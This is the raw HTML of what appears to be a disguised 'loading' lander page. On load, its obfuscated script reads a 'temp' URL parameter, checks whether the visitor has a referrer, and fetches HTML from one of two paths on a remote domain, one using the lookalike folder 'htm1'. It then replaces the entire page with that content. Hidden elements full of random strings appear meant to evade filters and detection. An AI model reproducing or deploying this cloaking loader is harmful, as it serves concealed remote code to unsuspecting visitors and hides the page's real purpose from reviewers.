<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .X0z3fl {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .X0z3fl .hrTyTJrkRk {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .X0z3fl .content {
            line-height: 50px;
            text-align: center
        }

        .X0z3fl .img {
            width: 100%
        }

        .X0z3fl .Z0Ebot {
            text-align: center
        }

        .X0z3fl .Z0Ebot span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .X0z3fl .Z0Ebot span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .X0z3fl .Z0Ebot span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .X0z3fl .Z0Ebot span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .X0z3fl .Z0Ebot span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .X0z3fl .Z0Ebot span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .X0z3fl .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function C3A63DVoRzGd(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var fhMSZfG = C3A63DVoRzGd('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ fhMSZfG +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ fhMSZfG +".html?a=share";
		}
		
        xgbVCS4=url+"#"+new Date().getTime();
        xgbVCS4 && function() {
            $.get(xgbVCS4, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>XfepRFiQDUA5TUPAHY9nHoIVYCH9jb80bfUuVmPjF3drvRKnQucWGnI0Q13xtvg0CSYCs4bC0</a>
<img  src='' style='display:none'>
<b style='display:none' >YCp4Vhttemv383ah8fl4XuJwehrNcO0SruejiZbQ1x04skaoN3GDQqEDgA</b>
<h1 style='display:none' >tSTOMVgjKZkr12BxFJki1VwqI7sUYSqn7Ol7</h1>
<li style='display:none' >CN6hoPuqCxwZjeXxdx62tZJ45pS3alTzvXVyQZQNAG8aajuX66YhzfN2tmmkG3e6FTuTZZlMDMCE</li>
<b style='display:none' >YCp4Vhttemv383ah8fl4XuJwehrNcO0SruejiZbQ1x04skaoN3GDQqEDgA</b>
<p  style='display:none'>zU1yn3vDW39FPRxWpCl4C1UwJIS4t4cUozbQCBVq8gA</p>
<p  style='display:none'>zU1yn3vDW39FPRxWpCl4C1UwJIS4t4cUozbQCBVq8gA</p><div class="X0z3fl">
    <div class="hrTyTJrkRk">
        <div class="Z0Ebot">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>nzVQFpILQnk48mDdP6SsjI8in0hbgDsPmcBW9UcM4NVpOy8vtj67JfWuAN7pI4OwvbQhOq</a>
<span style='display:none'>JQk4iHRpP3ZILAuiTcIbFEGxVzEQVJdEuZpP</span>
<div style='display:none'>upG7XtKf16w3f7ns24VdVDPTj9E0G3z3dUZFlLdHAUlGmjPwtmT52Fn2LMsEt02LqJD8ZCX</div>
<img  src='' style='display:none'>
<div style='display:none'>upG7XtKf16w3f7ns24VdVDPTj9E0G3z3dUZFlLdHAUlGmjPwtmT52Fn2LMsEt02LqJD8ZCX</div></body>
</html>